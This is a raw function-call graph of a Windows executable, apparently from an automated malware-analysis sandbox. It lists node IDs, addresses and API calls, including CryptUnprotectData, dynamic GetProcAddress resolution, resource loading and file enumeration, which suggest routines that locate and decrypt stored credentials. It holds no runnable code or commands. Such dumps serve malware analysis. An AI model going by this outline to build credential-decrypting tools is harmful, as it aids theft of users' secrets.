39084->38944 39085->39083 39086->39083 39087->38947 39088->38951 39090 40aa23 RegEnumValueW 39089->39090 39090->38958 39090->38959 39092 405335 39091->39092 39093 40522a 39091->39093 39092->38541 39094 40b2cc 27 API calls 39093->39094 39095 405234 39094->39095 39096 40a804 8 API calls 39095->39096 39097 40523a 39096->39097 39136 40b273 39097->39136 39099 405248 _mbscpy _mbscat GetProcAddress 39100 40b273 27 API calls 39099->39100 39101 405279 39100->39101 39139 405211 GetProcAddress 39101->39139 39103 405282 39104 40b273 27 API calls 39103->39104 39105 40528f 39104->39105 39140 405211 GetProcAddress 39105->39140 39107 405298 39108 40b273 27 API calls 39107->39108 39109 4052a5 39108->39109 39141 405211 GetProcAddress 39109->39141 39111 4052ae 39112 40b273 27 API calls 39111->39112 39113 4052bb 39112->39113 39142 405211 GetProcAddress 39113->39142 39115 4052c4 39116 40b273 27 API calls 39115->39116 39117 4052d1 39116->39117 39143 405211 GetProcAddress 39117->39143 39119 4052da 39120 40b273 27 API calls 39119->39120 39121 4052e7 39120->39121 39144 405211 GetProcAddress 39121->39144 39123 4052f0 39124 40b273 27 API calls 39123->39124 39125 4052fd 39124->39125 39145 405211 GetProcAddress 39125->39145 39127 405306 39128 40b273 27 API calls 39127->39128 39129 405313 39128->39129 39146 405211 GetProcAddress 39129->39146 39131 40531c 39132 40b273 27 API calls 39131->39132 39133 405329 39132->39133 39147 405211 GetProcAddress 39133->39147 39135 405332 39135->39092 39137 40b58d 27 API calls 39136->39137 39138 40b18c 39137->39138 39138->39099 39139->39103 39140->39107 39141->39111 39142->39115 39143->39119 39144->39123 39145->39127 39146->39131 39147->39135 39149 405220 39 API calls 39148->39149 39150 405369 39149->39150 39150->38976 39150->38977 39151->38980 39152->38983 39153->38979 39154->38977 39156 40440c FreeLibrary 39155->39156 39157 40436d 39156->39157 39158 40a804 8 API calls 39157->39158 39159 404377 39158->39159 39160 404383 39159->39160 39161 404405 39159->39161 39162 40b273 27 API calls 39160->39162 39161->38550 39161->38552 39161->38553 39163 40438d GetProcAddress 39162->39163 39164 40b273 27 API calls 39163->39164 39165 4043a7 GetProcAddress 39164->39165 39166 40b273 27 API calls 39165->39166 39167 4043ba GetProcAddress 39166->39167 39168 40b273 27 API calls 39167->39168 39169 4043ce GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043e2 GetProcAddress 39170->39171 39172 4043f1 39171->39172 39173 4043f7 39172->39173 39174 40440c FreeLibrary 39172->39174 39173->39161 39174->39161 39176 404413 FreeLibrary 39175->39176 39177 40441e 39175->39177 39176->39177 39177->38567 39178->38559 39180 40447e 39179->39180 39181 40442e 39179->39181 39182 404485 CryptUnprotectData 39180->39182 39183 40449c 39180->39183 39184 40b2cc 27 API calls 39181->39184 39182->39183 39183->38559 39185 404438 39184->39185 39186 40a804 8 API calls 39185->39186 39187 40443e 39186->39187 39188 404445 39187->39188 39189 404467 39187->39189 39190 40b273 27 API calls 39188->39190 39189->39180 39191 404475 FreeLibrary 39189->39191 39192 40444f GetProcAddress 39190->39192 39191->39180 39192->39189 39193 404460 39192->39193 39193->39189 39195 4135f6 39194->39195 39196 4135eb FreeLibrary 39194->39196 39195->38570 39196->39195 39198 4449c4 39197->39198 39199 444a52 39197->39199 39200 40b2cc 27 API calls 39198->39200 39199->38587 39199->38588 39201 4449cb 39200->39201 39202 40a804 8 API calls 39201->39202 39203 4449d1 39202->39203 39204 40b273 27 API calls 39203->39204 39205 4449dc GetProcAddress 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4449f3 GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 444a04 GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 444a15 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a26 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a37 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a48 GetProcAddress 39216->39217 39217->39199 39218->38598 39219->38598 39220->38598 39221->38598 39222->38589 39224 403a29 39223->39224 39238 403bed memset memset 39224->39238 39226 403ae7 39251 40b1ab ??3@YAXPAX ??3@YAXPAX 39226->39251 39227 403a3f memset 39232 403a2f 39227->39232 39229 403aef 39229->38605 39230 40a8d0 7 API calls 39230->39232 39231 409d1f 6 API calls 39231->39232 39232->39226 39232->39227 39232->39230 39232->39231 39233 409b98 GetFileAttributesW 39232->39233 39233->39232 39235 40a051 GetFileTime FindCloseChangeNotification 39234->39235 39236 4039ca CompareFileTime 39234->39236 39235->39236 39236->38605 39237->38606 39239 414c2e 16 API calls 39238->39239 39240 403c38 39239->39240 39241 409719 2 API calls 39240->39241 39242 403c3f wcscat 39241->39242 39243 414c2e 16 API calls 39242->39243 39244 403c61 39243->39244 39245 409719 2 API calls 39244->39245 39246 403c68 wcscat 39245->39246 39252 403af5 39246->39252 39249 403af5 20 API calls 39250 403c95 39249->39250 39250->39232 39251->39229 39253 403b02 39252->39253 39254 40ae18 9 API calls 39253->39254 39262 403b37 39254->39262 39255 403bdb 39257 40aebe FindClose 39255->39257 39256 40add4 wcscmp wcscmp 39256->39262 39258 403be6 39257->39258 39258->39249 39259 40ae18 9 API calls 39259->39262 39260 40ae51 9 API calls 39260->39262 39261 40aebe FindClose 39261->39262 39262->39255 39262->39256 39262->39259 39262->39260 39262->39261 39263 40a8d0 7 API calls 39262->39263 39263->39262 39265 409d1f 6 API calls 39264->39265 39266 404190 39265->39266 39279 409b98 GetFileAttributesW 39266->39279 39268 40419c 39269 4041a7 6 API calls 39268->39269 39270 40435c 39268->39270 39272 40424f 39269->39272 39270->38632 39272->39270 39273 40425e memset 39272->39273 39275 409d1f 6 API calls 39272->39275 39276 40a8ab 9 API calls 39272->39276 39280 414842 39272->39280 39273->39272 39274 404296 wcscpy 39273->39274 39274->39272 39275->39272 39277 4042b6 memset memset _snwprintf wcscpy 39276->39277 39277->39272 39278->38630 39279->39268 39283 41443e 39280->39283 39282 414866 39282->39272 39284 41444b 39283->39284 39285 414451 39284->39285 39286 4144a3 GetPrivateProfileStringW 39284->39286 39287 414491 39285->39287 39288 414455 wcschr 39285->39288 39286->39282 39290 414495 WritePrivateProfileStringW 39287->39290 39288->39287 39289 414463 _snwprintf 39288->39289 39289->39290 39290->39282 39291->38636 39293 40b2cc 27 API calls 39292->39293 39294 409615 39293->39294 39295 409d1f 6 API calls 39294->39295 39296 409625 39295->39296 39321 409b98 GetFileAttributesW 39296->39321 39298 409634 39299 409648 39298->39299 39322 4091b8 memset 39298->39322 39301 40b2cc 27 API calls 39299->39301 39303 408801 39299->39303 39302 40965d 39301->39302 39304 409d1f 6 API calls 39302->39304 39303->38639 39303->38640 39305 40966d 39304->39305 39374 409b98 GetFileAttributesW 39305->39374 39307 40967c 39307->39303 39308 409681 39307->39308 39375 409529 72 API calls 39308->39375 39310 409690 39310->39303 39311->38662 39312->38639 39313->38667 39314->38639 39315->38672 39321->39298 39376 40a6e6 WideCharToMultiByte 39322->39376 39324 409202 39377 444432 39324->39377 39327 40b273 27 API calls 39328 409236 39327->39328 39423 438552 39328->39423 39331 409383 39333 40b273 27 API calls 39331->39333 39335 409399 39333->39335 39334 409254 39336 40937b 39334->39336 39444 4253cf 17 API calls 39334->39444 39337 438552 134 API calls 39335->39337 39448 424f26 123 API calls 39336->39448 39355 4093a3 39337->39355 39340 409267 39445 4253cf 17 API calls 39340->39445 39341 4094ff 39452 443d90 39341->39452 39344 4251c4 137 API calls 39344->39355 39345 409273 39346 409507 39354 40951d 39346->39354 39472 408f2f 77 API calls 39346->39472 39348 4093df 39451 424f26 123 API calls 39348->39451 39352 4253cf 17 API calls 39352->39355 39354->39299 39355->39341 39355->39344 39355->39348 39355->39352 39357 4093e4 39355->39357 39449 4253af 17 API calls 39357->39449 39364 4093ed 39450 4253af 17 API calls 39364->39450 39367 4093f9 39367->39348 39368 409409 memcmp 39367->39368 39368->39348 39369 409421 memcmp 39368->39369 39370 4094a4 memcmp 39369->39370 39371 409435 39369->39371 39370->39348 39371->39348 39374->39307 39375->39310 39376->39324 39473 4438b5 39377->39473 39379 44444c 39385 409215 39379->39385 39487 415a6d 39379->39487 39381 444486 39384 4444b9 memcpy 39381->39384 39422 4444a4 39381->39422 39382 4442e6 11 API calls 39383 44469e 39382->39383 39383->39385 39387 443d90 111 API calls 39383->39387 39491 415258 39384->39491 39385->39327 39385->39354 39387->39385 39388 444524 39389 444541 39388->39389 39390 44452a 39388->39390 39494 444316 39389->39494 39391 416935 16 API calls 39390->39391 39391->39422 39394 444316 18 API calls 39395 444563 39394->39395 39396 444316 18 API calls 39395->39396 39397 44456f 39396->39397 39398 444316 18 API calls 39397->39398 39399 44457f 39398->39399 39399->39422 39508 432d4e 39399->39508 39402 444316 18 API calls 39422->39382 39561 438460 39423->39561 39425 409240 39425->39331 39426 4251c4 39425->39426 39573 424f07 39426->39573 39428 4251e4 39429 4251f7 39428->39429 39430 4251e8 39428->39430 39581 4250f8 39429->39581 39580 4446ea 11 API calls 39430->39580 39432 4251f2 39432->39334 39434 425209 39437 425249 39434->39437 39440 4250f8 127 API calls 39434->39440 39441 425287 39434->39441 39589 4384e9 135 API calls 39434->39589 39590 424f74 124 API calls 39434->39590 39437->39441 39591 424ff0 13 API calls 39437->39591 39440->39434 39593 415c7d 39441->39593 39442 425266 39442->39441 39444->39340 39445->39345 39448->39331 39449->39364 39450->39367 39451->39341 39453 443da3 39452->39453 39454 443db6 39452->39454 39597 41707a 39453->39597 39454->39346 39456 443da8 39457 443dbc 39456->39457 39458 443dac 39456->39458 39602 4300e8 39457->39602 39610 4446ea 11 API calls 39458->39610 39472->39354 39474 4438d0 39473->39474 39485 4438c9 39473->39485 39475 415378 memcpy memcpy 39474->39475 39476 4438d5 39475->39476 39477 4154e2 10 API calls 39476->39477 39478 443906 39476->39478 39476->39485 39477->39478 39479 443970 memset 39478->39479 39478->39485 39481 44398b 39479->39481 39480 4439a0 39482 415700 10 API calls 39480->39482 39480->39485 39481->39480 39484 41975c 10 API calls 39481->39484 39483 4439c0 39482->39483 39483->39485 39486 418981 10 API calls 39483->39486 39484->39480 39485->39379 39486->39485 39488 415a77 39487->39488 39489 415a8d 39488->39489 39490 415a7e memset 39488->39490 39489->39381 39490->39489 39492 4438b5 11 API calls 39491->39492 39493 41525d 39492->39493 39493->39388 39495 444328 39494->39495 39496 444423 39495->39496 39497 44434e 39495->39497 39498 4446ea 11 API calls 39496->39498 39499 432d4e memset memset memcpy 39497->39499 39505 444381 39498->39505 39500 44435a 39499->39500 39502 444375 39500->39502 39507 44438b 39500->39507 39501 432d4e memset memset memcpy 39503 4443ec 39501->39503 39504 416935 16 API calls 39502->39504 39503->39505 39506 416935 16 API calls 39503->39506 39504->39505 39505->39394 39506->39505 39507->39501 39509 432d65 39508->39509 39510 432d58 39508->39510 39509->39402 39511 432cc4 memset memset memcpy 39510->39511 39511->39509 39562 41703f 11 API calls 39561->39562 39563 43847a 39562->39563 39564 43848a 39563->39564 39565 43847e 39563->39565 39567 438270 134 API calls 39564->39567 39566 4446ea 11 API calls 39565->39566 39569 438488 39566->39569 39568 4384aa 39567->39568 39568->39569 39570 424f26 123 API calls 39568->39570 39569->39425 39571 4384bb 39570->39571 39572 438270 134 API calls 39571->39572 39572->39569 39574 424f1f 39573->39574 39575 424f0c 39573->39575 39577 424eea 11 API calls 39574->39577 39576 416760 11 API calls 39575->39576 39578 424f18 39576->39578 39579 424f24 39577->39579 39578->39428 39579->39428 39580->39432 39582 425108 39581->39582 39588 42510d 39581->39588 39583 424f74 124 API calls 39582->39583 39583->39588 39584 42569b 125 API calls 39585 42516e 39584->39585 39587 415c7d 16 API calls 39585->39587 39586 425115 39586->39434 39587->39586 39588->39584 39588->39586 39589->39434 39590->39434 39591->39442 39594 415c81 39593->39594 39596 415c9c 39593->39596 39594->39596 39596->39432 39598 417085 39597->39598 39599 4170ab 39597->39599 39598->39599 39600 416760 11 API calls 39598->39600 39599->39456 39601 4170a4 39600->39601 39601->39456 39603 430128 39602->39603 39606 4300fa 39602->39606 39606->39603 39610->39454 39640 413f4f 39613->39640 39616 413f37 K32GetModuleFileNameExW 39617 413f4a 39616->39617 39617->38698 39619 413969 wcscpy 39618->39619 39620 41396c wcschr 39618->39620 39632 413a3a 39619->39632 39620->39619 39622 41398e 39620->39622 39645 4097f7 wcslen wcslen _memicmp 39622->39645 39624 41399a 39625 4139a4 memset 39624->39625 39626 4139e6 39624->39626 39646 409dd5 GetWindowsDirectoryW wcscpy 39625->39646 39628 413a31 wcscpy 39626->39628 39629 4139ec memset 39626->39629 39628->39632 39647 409dd5 GetWindowsDirectoryW wcscpy 39629->39647 39630 4139c9 wcscpy wcscat 39630->39632 39632->38698 39633 413a11 memcpy wcscat 39633->39632 39635 413cb0 GetModuleHandleW 39634->39635 39636 413cda 39634->39636 39635->39636 39637 413cbf GetProcAddress 39635->39637 39638 413ce3 GetProcessTimes 39636->39638 39639 413cf6 39636->39639 39637->39636 39638->38701 39639->38701 39641 413f2f 39640->39641 39642 413f54 39640->39642 39641->39616 39641->39617 39643 40a804 8 API calls 39642->39643 39644 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39643->39644 39644->39641 39645->39624 39646->39630 39647->39633 39648->38722 39649->38745 39651 409cf9 GetVersionExW 39650->39651 39652 409d0a 39650->39652 39651->39652 39652->38751 39652->38756 39653->38757 39654->38760 39655->38762 39656->38827 39658 40bba5 39657->39658 39705 40cc26 39658->39705 39661 40bd4b 39726 40cc0c 39661->39726 39666 40b2cc 27 API calls 39667 40bbef 39666->39667 39733 40ccf0 _wcsicmp 39667->39733 39669 40bbf5 39669->39661 39734 40ccb4 6 API calls 39669->39734 39671 40bc26 39672 40cf04 17 API calls 39671->39672 39673 40bc2e 39672->39673 39674 40bd43 39673->39674 39675 40b2cc 27 API calls 39673->39675 39676 40cc0c 4 API calls 39674->39676 39677 40bc40 39675->39677 39676->39661 39735 40ccf0 _wcsicmp 39677->39735 39679 40bc46 39679->39674 39680 40bc61 memset memset WideCharToMultiByte 39679->39680 39736 40103c strlen 39680->39736 39682 40bcc0 39683 40b273 27 API calls 39682->39683 39684 40bcd0 memcmp 39683->39684 39684->39674 39685 40bce2 39684->39685 39686 404423 38 API calls 39685->39686 39687 40bd10 39686->39687 39687->39674 39688 40bd3a LocalFree 39687->39688 39689 40bd1f memcpy 39687->39689 39688->39674 39689->39688 39690->38842 39692 409a74 GetTempFileNameW 39691->39692 39693 409a66 GetWindowsDirectoryW 39691->39693 39692->38840 39693->39692 39694->38878 39695->38878 39696->38878 39697->38878 39698->38878 39699->38878 39700->38878 39701->38878 39702->38878 39703->38854 39704->38875 39737 4096c3 CreateFileW 39705->39737 39707 40cc34 39708 40cc3d GetFileSize 39707->39708 39716 40bbca 39707->39716 39709 40afcf 2 API calls 39708->39709 39710 40cc64 39709->39710 39738 40a2ef ReadFile 39710->39738 39712 40cc71 39739 40ab4a MultiByteToWideChar 39712->39739 39714 40cc95 FindCloseChangeNotification 39715 40b04b ??3@YAXPAX 39714->39715 39715->39716 39716->39661 39717 40cf04 39716->39717 39718 40b633 ??3@YAXPAX 39717->39718 39719 40cf14 39718->39719 39745 40b1ab ??3@YAXPAX ??3@YAXPAX 39719->39745 39721 40bbdd 39721->39661 39721->39666 39722 40cf1b 39722->39721 39724 40cfef 39722->39724 39746 40cd4b 39722->39746 39725 40cd4b 14 API calls 39724->39725 39725->39721 39727 40b633 ??3@YAXPAX 39726->39727 39728 40cc15 39727->39728 39729 40aa04 ??3@YAXPAX 39728->39729 39730 40cc1d 39729->39730 39790 40b1ab ??3@YAXPAX ??3@YAXPAX 39730->39790 39732 40b7d4 memset CreateFileW 39732->38834 39732->38835 39733->39669 39734->39671 39735->39679 39736->39682 39737->39707 39738->39712 39740 40ab93 39739->39740 39741 40ab6b 39739->39741 39740->39714 39742 40a9ce 4 API calls 39741->39742 39743 40ab74 39742->39743 39744 40ab7c MultiByteToWideChar 39743->39744 39744->39740 39745->39722 39747 40cd7b 39746->39747 39780 40aa29 6 API calls 39747->39780 39749 40cef5 39750 40aa04 ??3@YAXPAX 39749->39750 39751 40cefd 39750->39751 39751->39722 39752 40cd89 39752->39749 39781 40aa29 6 API calls 39752->39781 39754 40ce1d 39782 40aa29 6 API calls 39754->39782 39756 40ce3e 39757 40ce6a 39756->39757 39783 40abb7 wcslen memmove 39756->39783 39758 40ce9f 39757->39758 39786 40abb7 wcslen memmove 39757->39786 39760 40a8d0 7 API calls 39758->39760 39763 40ceb5 39760->39763 39761 40ce56 39784 40aa71 wcslen 39761->39784 39769 40a8d0 7 API calls 39763->39769 39765 40ce8b 39787 40aa71 wcslen 39765->39787 39766 40ce5e 39785 40abb7 wcslen memmove 39766->39785 39772 40cecb 39769->39772 39770 40ce93 39788 40abb7 wcslen memmove 39770->39788 39789 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39772->39789 39774 40cedd 39775 40aa04 ??3@YAXPAX 39774->39775 39776 40cee5 39775->39776 39777 40aa04 ??3@YAXPAX 39776->39777 39778 40ceed 39777->39778 39779 40aa04 ??3@YAXPAX 39778->39779 39779->39749 39780->39752 39781->39754 39782->39756 39783->39761 39784->39766 39785->39757 39786->39765 39787->39770 39788->39758 39789->39774 39790->39732 39791->38894 39792->38902 37666 44dea5 37667 44deb5 FreeLibrary 37666->37667 37668 44dec3 37666->37668 37667->37668 39802 4148b6 FindResourceW 39803 4148cf SizeofResource 39802->39803 39806 4148f9 39802->39806 39804 4148e0 LoadResource 39803->39804 39803->39806 39805 4148ee LockResource 39804->39805 39804->39806 39805->39806 37842 415304 ??3@YAXPAX 39807 441b3f 39817 43a9f6 39807->39817 39809 441b61 39990 4386af memset 39809->39990 39811 44189a 39812 4418e2 39811->39812 39816 442bd4 39811->39816 39813 4418ea 39812->39813 39991 4414a9 12 API calls 39812->39991 39816->39813 39992 441409 memset 39816->39992 39818 43aa20 39817->39818 39819 43aadf 39817->39819 39818->39819 39820 43aa34 memset 39818->39820 39819->39809 39821 43aa56 39820->39821 39822 43aa4d 39820->39822 39993 43a6e7 39821->39993 40001 42c02e memset 39822->40001 39827 43aad3 40003 4169a7 11 API calls 39827->40003 39828 43aaae 39828->39819 39828->39827 39843 43aae5 39828->39843 39829 43ac18 39832 43ac47 39829->39832 40005 42bbd5 memcpy memcpy memcpy memset memcpy 39829->40005 39833 43aca8 39832->39833 40006 438eed 16 API calls 39832->40006 39836 43acd5 39833->39836 40008 4233ae 11 API calls 39833->40008 40009 423426 11 API calls 39836->40009 39837 43ac87 40007 4233c5 16 API calls 39837->40007 39841 43ace1 40010 439811 163 API calls 39841->40010 39842 43a9f6 161 API calls 39842->39843 39843->39819 39843->39829 39843->39842 40004 439bbb 22 API calls 39843->40004 39845 43acfd 39851 43ad2c 39845->39851 40011 438eed 16 API calls 39845->40011 39847 43ad19 40012 4233c5 16 API calls 39847->40012 39848 43ad58 40013 44081d 163 API calls 39848->40013 39851->39848 39854 43add9 39851->39854 39853 43ae3a memset 39855 43ae73 39853->39855 39854->39854 40017 423426 11 API calls 39854->40017 40018 42e1c0 147 API calls 39855->40018 39856 43adab 40015 438c4e 163 API calls 39856->40015 39859 43ad6c 39859->39819 39859->39856 40014 42370b memset memcpy memset 39859->40014 39860 43adcc 40016 440f84 12 API calls 39860->40016 39861 43ae96 40019 42e1c0 147 API calls 39861->40019 39865 43aea8 39866 43aec1 39865->39866 40020 42e199 147 API calls 39865->40020 39867 43af00 39866->39867 40021 42e1c0 147 API calls 39866->40021 39867->39819 39871 43af1a 39867->39871 39872 43b3d9 39867->39872 40022 438eed 16 API calls 39871->40022 39877 43b3f6 39872->39877 39881 43b4c8 39872->39881 39874 43b60f 39874->39819 40081 4393a5 17 API calls 39874->40081 39875 43af2f 40023 4233c5 16 API calls 39875->40023 40063 432878 12 API calls 39877->40063 39879 43af51 40024 423426 11 API calls 39879->40024 39887 43b4f2 39881->39887 40069 42bbd5 memcpy memcpy memcpy memset memcpy 39881->40069 39883 43af7d 40025 423426 11 API calls 39883->40025 40070 43a76c 21 API calls 39887->40070 39888 43b529 40071 44081d 163 API calls 39888->40071 39889 43b462 40065 423330 11 API calls 39889->40065 39890 43af94 40026 423330 11 API calls 39890->40026 39894 43b47e 39899 43b497 39894->39899 40066 42374a memcpy memset memcpy memcpy memcpy 39894->40066 39895 43b544 39900 43b55c 39895->39900 40072 42c02e memset 39895->40072 39896 43b428 39896->39889 40064 432b60 16 API calls 39896->40064 39897 43afca 40027 423330 11 API calls 39897->40027 40067 4233ae 11 API calls 39899->40067 40073 43a87a 163 API calls 39900->40073 39901 43afdb 40028 4233ae 11 API calls 39901->40028 39907 43b56c 39910 43b58a 39907->39910 40074 423330 11 API calls 39907->40074 39908 43b4b1 40068 423399 11 API calls 39908->40068 39909 43afee 40029 44081d 163 API calls 39909->40029 40075 440f84 12 API calls 39910->40075 39915 43b4c1 40077 42db80 163 API calls 39915->40077 39917 43b592 40076 43a82f 16 API calls 39917->40076 39920 43b5b4 40078 438c4e 163 API calls 39920->40078 39922 43b5cf 40079 42c02e memset 39922->40079 39924 43b005 39924->39819 39928 43b01f 39924->39928 40030 42d836 163 API calls 39924->40030 39925 43b1ef 40040 4233c5 16 API calls 39925->40040 39928->39925 40038 423330 11 API calls 39928->40038 40039 42d71d 163 API calls 39928->40039 39929 43b212 40041 423330 11 API calls 39929->40041 39930 43b087 40031 4233ae 11 API calls 39930->40031 39931 43add4 39931->39874 40080 438f86 16 API calls 39931->40080 39936 43b22a 40042 42ccb5 11 API calls 39936->40042 39938 43b23f 40043 4233ae 11 API calls 39938->40043 39939 43b10f 40034 423330 11 API calls 39939->40034 39941 43b257 40044 4233ae 11 API calls 39941->40044 39945 43b129 40035 4233ae 11 API calls 39945->40035 39946 43b26e 40045 4233ae 11 API calls 39946->40045 39949 43b09a 39949->39939 40032 42cc15 19 API calls 39949->40032 40033 4233ae 11 API calls 39949->40033 39950 43b282 40046 43a87a 163 API calls 39950->40046 39952 43b13c 40036 440f84 12 API calls 39952->40036 39954 43b29d 40047 423330 11 API calls 39954->40047 39957 43b15f 40037 4233ae 11 API calls 39957->40037 39958 43b2af 39960 43b2b8 39958->39960 39961 43b2ce 39958->39961 40048 4233ae 11 API calls 39960->40048 40049 440f84 12 API calls 39961->40049 39964 43b2c9 40051 4233ae 11 API calls 39964->40051 39965 43b2da 40050 42370b memset memcpy memset 39965->40050 39968 43b2f9 40052 423330 11 API calls 39968->40052 39970 43b30b 40053 423330 11 API calls 39970->40053 39972 43b325 40054 423399 11 API calls 39972->40054 39974 43b332 40055 4233ae 11 API calls 39974->40055 39976 43b354 40056 423399 11 API calls 39976->40056 39978 43b364 40057 43a82f 16 API calls 39978->40057 39980 43b370 40058 42db80 163 API calls 39980->40058 39982 43b380 40059 438c4e 163 API calls 39982->40059 39984 43b39e 40060 423399 11 API calls 39984->40060 39986 43b3ae 40061 43a76c 21 API calls 39986->40061 39988 43b3c3 40062 423399 11 API calls 39988->40062 39990->39811 39991->39813 39992->39816 39994 43a6f5 39993->39994 39995 43a765 39993->39995 39994->39995 40082 42a115 39994->40082 39995->39819 40002 4397fd memset 39995->40002 39999 43a73d 39999->39995 40000 42a115 147 API calls 39999->40000 40000->39995 40001->39821 40002->39828 40003->39819 40004->39843 40005->39832 40006->39837 40007->39833 40008->39836 40009->39841 40010->39845 40011->39847 40012->39851 40013->39859 40014->39856 40015->39860 40016->39931 40017->39853 40018->39861 40019->39865 40020->39866 40021->39866 40022->39875 40023->39879 40024->39883 40025->39890 40026->39897 40027->39901 40028->39909 40029->39924 40030->39930 40031->39949 40032->39949 40033->39949 40034->39945 40035->39952 40036->39957 40037->39928 40038->39928 40039->39928 40040->39929 40041->39936 40042->39938 40043->39941 40044->39946 40045->39950 40046->39954 40047->39958 40048->39964 40049->39965 40050->39964 40051->39968 40052->39970 40053->39972 40054->39974 40055->39976 40056->39978 40057->39980 40058->39982 40059->39984 40060->39986 40061->39988 40062->39931 40063->39896 40064->39889 40065->39894 40066->39899 40067->39908 40068->39915 40069->39887 40070->39888 40071->39895 40072->39900 40073->39907 40074->39910 40075->39917 40076->39915 40077->39920 40078->39922 40079->39931 40080->39874 40081->39819 40083 42a175 40082->40083 40085 42a122 40082->40085 40083->39995 40088 42b13b 147 API calls 40083->40088 40085->40083 40086 42a115 147 API calls 40085->40086 40089 43a174 40085->40089 40113 42a0a8 147 API calls 40085->40113 40086->40085 40088->39999 40103 43a196 40089->40103 40104 43a19e 40089->40104 40090 43a306 40090->40103 40133 4388c4 14 API calls 40090->40133 40093 42a115 147 API calls 40093->40104 40095 43a642 40095->40103 40137 4169a7 11 API calls 40095->40137 40099 43a635 40136 42c02e memset 40099->40136 40103->40085 40104->40090 40104->40093 40104->40103 40114 42ff8c 40104->40114 40122 415a91 40104->40122 40126 4165ff 40104->40126 40129 439504 13 API calls 40104->40129 40130 4312d0 147 API calls 40104->40130 40131 42be4c memcpy memcpy memcpy memset memcpy 40104->40131 40132 43a121 11 API calls 40104->40132 40106 4169a7 11 API calls 40107 43a325 40106->40107 40107->40095 40107->40099 40107->40103 40107->40106 40108 42b5b5 memset memcpy 40107->40108 40109 42bf4c 14 API calls 40107->40109 40112 4165ff 11 API calls 40107->40112 40134 42b63e 14 API calls 40107->40134 40135 42bfcf memcpy 40107->40135 40108->40107 40109->40107 40112->40107 40113->40085 40138 43817e 40114->40138 40116 42ff99 40117 42ffe3 40116->40117 40118 42ffd0 40116->40118 40121 42ff9d 40116->40121 40143 4169a7 11 API calls 40117->40143 40142 4169a7 11 API calls 40118->40142 40121->40104 40123 415a9d 40122->40123 40124 415ab3 40123->40124 40125 415aa4 memset 40123->40125 40124->40104 40125->40124 40290 4165a0 40126->40290 40129->40104 40130->40104 40131->40104 40132->40104 40133->40107 40134->40107 40135->40107 40136->40095 40137->40103 40139 438187 40138->40139 40141 438192 40138->40141 40144 4380f6 40139->40144 40141->40116 40142->40121 40143->40121 40146 43811f 40144->40146 40145 438164 40145->40141 40146->40145 40148 4300e8 3 API calls 40146->40148 40149 437e5e 40146->40149 40148->40146 40172 437d3c 40149->40172 40151 437eb3 40151->40146 40152 437ea9 40152->40151 40157 437f22 40152->40157 40187 41f432 40152->40187 40155 437f06 40234 415c56 11 API calls 40155->40234 40159 432d4e 3 API calls 40157->40159 40160 437f7f 40157->40160 40158 437f95 40235 415c56 11 API calls 40158->40235 40159->40160 40160->40158 40161 43802b 40160->40161 40163 4165ff 11 API calls 40161->40163 40164 438054 40163->40164 40198 437371 40164->40198 40167 43806b 40168 438094 40167->40168 40236 42f50e 138 API calls 40167->40236 40170 437fa3 40168->40170 40171 4300e8 3 API calls 40168->40171 40170->40151 40237 41f638 104 API calls 40170->40237 40171->40170 40173 437d69 40172->40173 40176 437d80 40172->40176 40238 437ccb 11 API calls 40173->40238 40175 437d76 40175->40152 40176->40175 40177 437da3 40176->40177 40179 437d90 40176->40179 40180 438460 134 API calls 40177->40180 40179->40175 40242 437ccb 11 API calls 40179->40242 40183 437dcb 40180->40183 40181 437de8 40241 424f26 123 API calls 40181->40241 40183->40181 40239 444283 13 API calls 40183->40239 40185 437dfc 40240 437ccb 11 API calls 40185->40240 40188 41f54d 40187->40188 40194 41f44f 40187->40194 40189 41f466 40188->40189 40272 41c635 memset memset 40188->40272 40189->40155 40189->40157 40194->40189 40196 41f50b 40194->40196 40243 41f1a5 40194->40243 40268 41c06f memcmp 40194->40268 40269 41f3b1 90 API calls 40194->40269 40270 41f398 86 API calls 40194->40270 40196->40188 40196->40189 40271 41c295 86 API calls 40196->40271 40273 41703f 40198->40273 40200 437399 40201 43739d 40200->40201 40203 4373ac 40200->40203 40280 4446ea 11 API calls 40201->40280 40204 416935 16 API calls 40203->40204 40205 4373ca 40204->40205 40206 438460 134 API calls 40205->40206 40211 4251c4 137 API calls 40205->40211 40215 415a91 memset 40205->40215 40218 43758f 40205->40218 40230 437584 40205->40230 40233 437d3c 135 API calls 40205->40233 40281 425433 13 API calls 40205->40281 40282 425413 17 API calls 40205->40282 40283 42533e 16 API calls 40205->40283 40284 42538f 16 API calls 40205->40284 40285 42453e 123 API calls 40205->40285 40206->40205 40207 4375bc 40209 415c7d 16 API calls 40207->40209 40210 4375d2 40209->40210 40212 4442e6 11 API calls 40210->40212 40232 4373a7 40210->40232 40211->40205 40213 4375e2 40212->40213 40213->40232 40288 444283 13 API calls 40213->40288 40215->40205 40286 42453e 123 API calls 40218->40286 40221 4375f4 40224 437620 40221->40224 40225 43760b 40221->40225 40223 43759f 40226 416935 16 API calls 40223->40226 40228 416935 16 API calls 40224->40228 40289 444283 13 API calls 40225->40289 40226->40230 40228->40232 40230->40207 40287 42453e 123 API calls 40230->40287 40231 437612 memcpy 40231->40232 40232->40167 40233->40205 40234->40151 40235->40170 40236->40168 40237->40151 40238->40175 40239->40185 40240->40181 40241->40175 40242->40175 40244 41bc3b 101 API calls 40243->40244 40245 41f1b4 40244->40245 40246 41edad 86 API calls 40245->40246 40253 41f282 40245->40253 40247 41f1cb 40246->40247 40248 41f1f5 memcmp 40247->40248 40249 41f20e 40247->40249 40247->40253 40248->40249 40250 41f21b memcmp 40249->40250 40249->40253 40251 41f326 40250->40251 40254 41f23d 40250->40254 40252 41ee6b 86 API calls 40251->40252 40251->40253 40252->40253 40253->40194 40254->40251 40255 41f28e memcmp 40254->40255 40257 41c8df 56 API calls 40254->40257 40255->40251 40256 41f2a9 40255->40256 40256->40251 40259 41f308 40256->40259 40260 41f2d8 40256->40260 40258 41f269 40257->40258 40258->40251 40261 41f287 40258->40261 40262 41f27a 40258->40262 40259->40251 40266 4446ce 11 API calls 40259->40266 